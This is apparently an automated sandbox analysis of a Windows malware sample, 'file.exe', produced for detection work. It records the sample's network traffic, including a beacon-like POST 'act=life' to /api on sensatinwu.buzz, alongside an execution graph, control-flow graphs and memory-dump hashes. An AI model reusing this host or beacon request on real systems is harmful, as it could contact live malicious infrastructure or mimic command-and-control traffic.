                          2024-10-06 08:43:58 UTC1870INHTTP/1.1 200 OK
                          Server: nginx
                          Content-Type: text/html; charset=UTF-8
                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                          Cache-Control: no-cache
                          Date: Sun, 06 Oct 2024 08:43:58 GMT
                          Content-Length: 34827
                          Connection: close
                          Set-Cookie: sessionid=e8715db59ab58234adcc530b; Path=/; Secure; SameSite=None
                          Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                          2024-10-06 08:43:58 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                          2024-10-06 08:43:59 UTC16384INData Raw: 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65
                          Data Ascii: t type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_he
                          2024-10-06 08:43:59 UTC3768INData Raw: 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f
                          Data Ascii: lass="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitPro
                          2024-10-06 08:43:59 UTC161INData Raw: 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                          Data Ascii: w mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.549705188.114.96.34436360C:\Users\user\Desktop\file.exe
                          TimestampBytes transferredDirectionData
                          2024-10-06 08:43:59 UTC262OUTPOST /api HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                          Content-Length: 8
                          Host: sensatinwu.buzz
                          2024-10-06 08:43:59 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                          Data Ascii: act=life
                          2024-10-06 08:44:00 UTC768INHTTP/1.1 200 OK
                          Date: Sun, 06 Oct 2024 08:44:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Set-Cookie: PHPSESSID=qhug0iviqnma0h25d0fg7obkkg; expires=Thu, 30 Jan 2025 02:30:38 GMT; Max-Age=9999999; path=/
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rN0SWIf6tXC%2F5K1dZasJEBNfKEM2EqLr9M13RYCbAs8jbSFrkz%2F9GiD4xs3DoWXUdeo44IF9m3wqIplh7wyMuF3uRXH%2BOlLs0HsEGXqkssXnNmB7pQypNw9XV5dTiH5ZiHw%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8ce45df1edbf4204-EWR
                          2024-10-06 08:44:00 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                          Data Ascii: aerror #D12
                          2024-10-06 08:44:00 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Target ID:0
                          Start time:04:43:54
                          Start date:06/10/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
                          Imagebase:0x5b0000
                          File size:1'836'032 bytes
                          MD5 hash:C8916AAE53838AF9E4DD5B25929C3011
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Reset < >

                            Execution Graph

                            Execution Coverage:0.9%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:66.7%
                            Total number of Nodes:36
                            Total number of Limit Nodes:4
                            execution_graph 20629 5ed9cb 20631 5ed9fb 20629->20631 20630 5eda65 20631->20630 20633 5f5bb0 LdrInitializeThunk 20631->20633 20633->20631 20583 5c049b 20586 5c0227 20583->20586 20584 5c0455 20590 5f5700 RtlFreeHeap 20584->20590 20585 5c0308 20586->20584 20586->20585 20589 5f5700 RtlFreeHeap 20586->20589 20589->20584 20590->20585 20591 5f64b8 20593 5f63f2 20591->20593 20592 5f646e 20593->20592 20595 5f5bb0 LdrInitializeThunk 20593->20595 20595->20592 20596 5bd110 20600 5bd119 20596->20600 20597 5bd2ee ExitProcess 20598 5bd2e9 20603 5f56e0 FreeLibrary 20598->20603 20600->20597 20600->20598 20602 5c0b40 FreeLibrary 20600->20602 20602->20598 20603->20597 20634 5f3202 RtlAllocateHeap 20604 5bedb5 20605 5bedd0 20604->20605 20605->20605 20608 5bfca0 20605->20608 20611 5bfcdc 20608->20611 20609 5bef70 20611->20609 20612 5f3220 20611->20612 20613 5f32ac 20612->20613 20614 5f32a2 RtlFreeHeap 20612->20614 20615 5f3236 20612->20615 20613->20609 20614->20613 20615->20614 20616 5f99d0 20617 5f99f5 20616->20617 20620 5f9a5f 20617->20620 20622 5f5bb0 LdrInitializeThunk 20617->20622 20619 5f9b0e 20620->20619 20623 5f5bb0 LdrInitializeThunk 20620->20623 20622->20620 20623->20619

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 25 5bfca0-5bfcda 26 5bfd0b-5bfe22 25->26 27 5bfcdc-5bfcdf 25->27 29 5bfe5b-5bfe8c 26->29 30 5bfe24 26->30 28 5bfce0-5bfd09 call 5c2690 27->28 28->26 33 5bfe8e-5bfe8f 29->33 34 5bfeb6-5bfecf call 5c0b50 29->34 32 5bfe30-5bfe59 call 5c2760 30->32 32->29 38 5bfe90-5bfeb4 call 5c2700 33->38 43 5bfed5-5bfef8 34->43 44 5bffe4-5bffe6 34->44 38->34 45 5bff2b-5bff2d 43->45 46 5bfefa 43->46 47 5c01b1-5c01bb 44->47 49 5bff30-5bff3a 45->49 48 5bff00-5bff29 call 5c27e0 46->48 48->45 51 5bff3c-5bff3f 49->51 52 5bff41-5bff49 49->52 51->49 51->52 54 5bff4f-5bff76 52->54 55 5c01a2-5c01a5 call 5f3220 52->55 57 5bffab-5bffb5 54->57 58 5bff78 54->58 62 5c01aa-5c01ad 55->62 60 5bffeb 57->60 61 5bffb7-5bffbb 57->61 59 5bff80-5bffa9 call 5c2840 58->59 59->57 65 5bffed-5bffef 60->65 64 5bffc7-5bffcb 61->64 62->47 67 5c019a 64->67 68 5bffd1-5bffd8 64->68 65->67 69 5bfff5-5c002c 65->69 67->55 70 5bffda-5bffdc 68->70 71 5bffde 68->71 72 5c002e-5c002f 69->72 73 5c005b-5c0065 69->73 70->71 77 5bffc0-5bffc5 71->77 78 5bffe0-5bffe2 71->78 74 5c0030-5c0059 call 5c28a0 72->74 75 5c00a4 73->75 76 5c0067-5c006f 73->76 74->73 81 5c00a6-5c00a8 75->81 80 5c0087-5c008b 76->80 77->64 77->65 78->77 80->67 83 5c0091-5c0098 80->83 81->67 84 5c00ae-5c00c5 81->84 85 5c009e 83->85 86 5c009a-5c009c 83->86 87 5c00fb-5c0102 84->87 88 5c00c7 84->88 91 5c0080-5c0085 85->91 92 5c00a0-5c00a2 85->92 86->85 89 5c0104-5c010d 87->89 90 5c0130-5c013c 87->90 93 5c00d0-5c00f9 call 5c2900 88->93 95 5c0117-5c011b 89->95 96 5c01c2-5c01c7 90->96 91->80 91->81 92->91 93->87 95->67 98 5c011d-5c0124 95->98 96->55 99 5c012a 98->99 100 5c0126-5c0128 98->100 101 5c012c-5c012e 99->101 102 5c0110-5c0115 99->102 100->99 101->102 102->95 103 5c0141-5c0143 102->103 103->67 104 5c0145-5c015b 103->104 104->96 105 5c015d-5c015f 104->105 106 5c0163-5c0166 105->106 107 5c01bc 106->107 108 5c0168-5c0188 call 5c2030 106->108 107->96 111 5c018a-5c0190 108->111 112 5c0192-5c0198 108->112 111->106 111->112 112->96
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2094055595.00000000005B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005B0000, based on PE: true
                            • Associated: 00000000.00000002.2094042471.00000000005B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.0000000000785000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.00000000008AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094331243.00000000008AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094441890.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094455168.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5b0000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID: J|BJ$V$VY^_$t
                            • API String ID: 0-3701112211
                            • Opcode ID: ba641d0435f0d2f0a78f624336688ca5ca560bf41a9c3fe6d73d11f3a620bd88
                            • Instruction ID: b105d59193cd874177be819bc631bd280aab3d2a3b7942fae8693009689e68bb
                            • Opcode Fuzzy Hash: ba641d0435f0d2f0a78f624336688ca5ca560bf41a9c3fe6d73d11f3a620bd88
                            • Instruction Fuzzy Hash: E0D165745083809FD311DF588894B6FBFE2BB92B48F58881CE4C99B252C736DD49DB92

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 149 5bd110-5bd11b call 5f4cc0 152 5bd2ee-5bd2f6 ExitProcess 149->152 153 5bd121-5bd130 call 5ec8d0 149->153 157 5bd2e9 call 5f56e0 153->157 158 5bd136-5bd15f 153->158 157->152 162 5bd161 158->162 163 5bd196-5bd1bf 158->163 164 5bd170-5bd194 call 5bd300 162->164 165 5bd1c1 163->165 166 5bd1f6-5bd20c 163->166 164->163 168 5bd1d0-5bd1f4 call 5bd370 165->168 169 5bd239-5bd23b 166->169 170 5bd20e-5bd20f 166->170 168->166 172 5bd23d-5bd25a 169->172 173 5bd286-5bd2aa 169->173 171 5bd210-5bd237 call 5bd3e0 170->171 171->169 172->173 177 5bd25c-5bd25f 172->177 178 5bd2ac-5bd2af 173->178 179 5bd2d6 call 5be8f0 173->179 182 5bd260-5bd284 call 5bd440 177->182 183 5bd2b0-5bd2d4 call 5bd490 178->183 185 5bd2db-5bd2dd 179->185 182->173 183->179 185->157 188 5bd2df-5bd2e4 call 5c2f10 call 5c0b40 185->188 188->157
                            APIs
                            • ExitProcess.KERNEL32(00000000), ref: 005BD2F1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2094055595.00000000005B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005B0000, based on PE: true
                            • Associated: 00000000.00000002.2094042471.00000000005B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.0000000000785000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.00000000008AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094331243.00000000008AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094441890.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094455168.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5b0000_file.jbxd
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: a1016c5a96fd85d1b67ef48b44be28d1aba4d42333e709e8f95edca526eb47f7
                            • Instruction ID: cd77a41011fe3075221340a07167fe0de06a19c29c78aadd346290b995bd7801
                            • Opcode Fuzzy Hash: a1016c5a96fd85d1b67ef48b44be28d1aba4d42333e709e8f95edca526eb47f7
                            • Instruction Fuzzy Hash: 4141217450D380ABD601AB68D689A2EFFF5AF92744F148C1CE5C497252E33AE8109B67

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 204 5f5bb0-5f5be2 LdrInitializeThunk
                            APIs
                            • LdrInitializeThunk.NTDLL(005F973D,005C003F,00000006,?,?,00000018,8C8D8A8B,?,?), ref: 005F5BDE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2094055595.00000000005B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005B0000, based on PE: true
                            • Associated: 00000000.00000002.2094042471.00000000005B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.0000000000785000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.00000000008AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094331243.00000000008AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094441890.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094455168.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5b0000_file.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                            • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                            • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                            • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 233 5f695b-5f696b call 5f4a20 236 5f696d 233->236 237 5f6981-5f6a02 233->237 240 5f6970-5f697f 236->240 238 5f6a36-5f6a42 237->238 239 5f6a04 237->239 242 5f6a85-5f6a9f 238->242 243 5f6a44-5f6a4f 238->243 241 5f6a10-5f6a34 call 5f73e0 239->241 240->237 240->240 241->238 245 5f6a50-5f6a57 243->245 247 5f6a59-5f6a5c 245->247 248 5f6a60-5f6a66 245->248 247->245 249 5f6a5e 247->249 248->242 250 5f6a68-5f6a7d call 5f5bb0 248->250 249->242 252 5f6a82 250->252 252->242
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2094055595.00000000005B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005B0000, based on PE: true
                            • Associated: 00000000.00000002.2094042471.00000000005B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.0000000000785000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.00000000008AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094331243.00000000008AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094441890.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094455168.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5b0000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: 4120b7f009804a79037107f4620b6a15487480de3b03eb4e0e09f5aeba76146a
                            • Instruction ID: ed05c3c05bf3f26975d2d18a819d3776e650f8d40cad8f05370c4a5f6b58ebcf
                            • Opcode Fuzzy Hash: 4120b7f009804a79037107f4620b6a15487480de3b03eb4e0e09f5aeba76146a
                            • Instruction Fuzzy Hash: 413196B05083059FD718DF28C8A063BBBF2FF84344F48981CE6C6972A1E3399904CB56

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 253 5c049b-5c0515 call 5bc9f0 257 5c051c-5c051e 253->257 258 5c03be 253->258 259 5c03de-5c03e3 253->259 260 5c035f-5c0367 253->260 261 5c0339-5c034f 253->261 262 5c045b-5c0469 call 5f5700 253->262 263 5c03fb-5c0414 253->263 264 5c0356 253->264 265 5c0417-5c0430 253->265 266 5c0370-5c037e 253->266 267 5c03d0-5c03d7 253->267 268 5c0311-5c0332 253->268 269 5c0472-5c0477 253->269 270 5c0393-5c0397 253->270 271 5c03ec-5c03f4 253->271 272 5c0308-5c030c 253->272 273 5c0246-5c0260 253->273 274 5c0386-5c038c 253->274 275 5c0227-5c023b 253->275 276 5c0440-5c0458 call 5f5700 253->276 277 5c0480 253->277 278 5c0242-5c0244 253->278 279 5c0482-5c0484 253->279 282 5c0520-5c0b30 257->282 258->267 259->271 260->266 261->258 261->259 261->260 261->262 261->263 261->264 261->265 261->266 261->267 261->269 261->270 261->271 261->274 261->276 261->277 261->279 262->269 263->265 264->260 265->276 266->274 267->259 267->263 267->265 267->269 267->270 267->271 267->274 267->277 267->279 268->258 268->259 268->260 268->261 268->262 268->263 268->264 268->265 268->266 268->267 268->269 268->270 268->271 268->274 268->276 268->277 268->279 269->277 290 5c03a0-5c03b7 270->290 271->263 271->269 271->270 271->277 271->279 280 5c048d-5c0496 272->280 284 5c0294 273->284 285 5c0262 273->285 274->269 274->270 274->277 274->279 275->258 275->259 275->260 275->261 275->262 275->263 275->264 275->265 275->266 275->267 275->268 275->269 275->270 275->271 275->272 275->273 275->274 275->276 275->277 275->278 275->279 276->262 283 5c0296-5c02bd 278->283 279->280 280->282 292 5c02bf 283->292 293 5c02ea-5c0301 283->293 284->283 291 5c0270-5c0292 call 5c2eb0 285->291 290->258 290->259 290->262 290->263 290->265 290->267 290->269 290->270 290->271 290->274 290->276 290->277 290->279 291->284 300 5c02c0-5c02e8 call 5c2e70 292->300 293->258 293->259 293->260 293->261 293->262 293->263 293->264 293->265 293->266 293->267 293->268 293->269 293->270 293->271 293->272 293->274 293->276 293->277 293->279 300->293
                            Memory Dump Source
                            • Source File: 00000000.00000002.2094055595.00000000005B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005B0000, based on PE: true
                            • Associated: 00000000.00000002.2094042471.00000000005B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.0000000000785000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.00000000008AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094331243.00000000008AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094441890.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094455168.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5b0000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b301305098423182863baed974a946d06257363e7794797ea3cd43dba0a4477e
                            • Instruction ID: bd3520848a7fc34cddc693cb6a0d6746056c05ef645fb5553ff30cedc4124fef
                            • Opcode Fuzzy Hash: b301305098423182863baed974a946d06257363e7794797ea3cd43dba0a4477e
                            • Instruction Fuzzy Hash: 81916B75200701DFD7248F25E894B27B7FAFF89314B118A6CE956C7AA1DB34E819CB50

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 307 5c0228-5c023b 308 5c03be 307->308 309 5c03de-5c03e3 307->309 310 5c035f-5c0367 307->310 311 5c0339-5c034f 307->311 312 5c045b-5c0469 call 5f5700 307->312 313 5c03fb-5c0414 307->313 314 5c0356 307->314 315 5c0417-5c0430 307->315 316 5c0370-5c037e 307->316 317 5c03d0-5c03d7 307->317 318 5c0311-5c0332 307->318 319 5c0472-5c0477 307->319 320 5c0393-5c0397 307->320 321 5c03ec-5c03f4 307->321 322 5c0308-5c030c 307->322 323 5c0246-5c0260 307->323 324 5c0386-5c038c 307->324 325 5c0440-5c0458 call 5f5700 307->325 326 5c0480 307->326 327 5c0242-5c0244 307->327 328 5c0482-5c0484 307->328 308->317 309->321 310->316 311->308 311->309 311->310 311->312 311->313 311->314 311->315 311->316 311->317 311->319 311->320 311->321 311->324 311->325 311->326 311->328 312->319 313->315 314->310 315->325 316->324 317->309 317->313 317->315 317->319 317->320 317->321 317->324 317->326 317->328 318->308 318->309 318->310 318->311 318->312 318->313 318->314 318->315 318->316 318->317 318->319 318->320 318->321 318->324 318->325 318->326 318->328 319->326 338 5c03a0-5c03b7 320->338 321->313 321->319 321->320 321->326 321->328 329 5c048d-5c0b30 322->329 332 5c0294 323->332 333 5c0262 323->333 324->319 324->320 324->326 324->328 325->312 331 5c0296-5c02bd 327->331 328->329 340 5c02bf 331->340 341 5c02ea-5c0301 331->341 332->331 339 5c0270-5c0292 call 5c2eb0 333->339 338->308 338->309 338->312 338->313 338->315 338->317 338->319 338->320 338->321 338->324 338->325 338->326 338->328 339->332 347 5c02c0-5c02e8 call 5c2e70 340->347 341->308 341->309 341->310 341->311 341->312 341->313 341->314 341->315 341->316 341->317 341->318 341->319 341->320 341->321 341->322 341->324 341->325 341->326 341->328 347->341
                            Memory Dump Source
                            • Source File: 00000000.00000002.2094055595.00000000005B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005B0000, based on PE: true
                            • Associated: 00000000.00000002.2094042471.00000000005B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.0000000000785000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2094089963.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
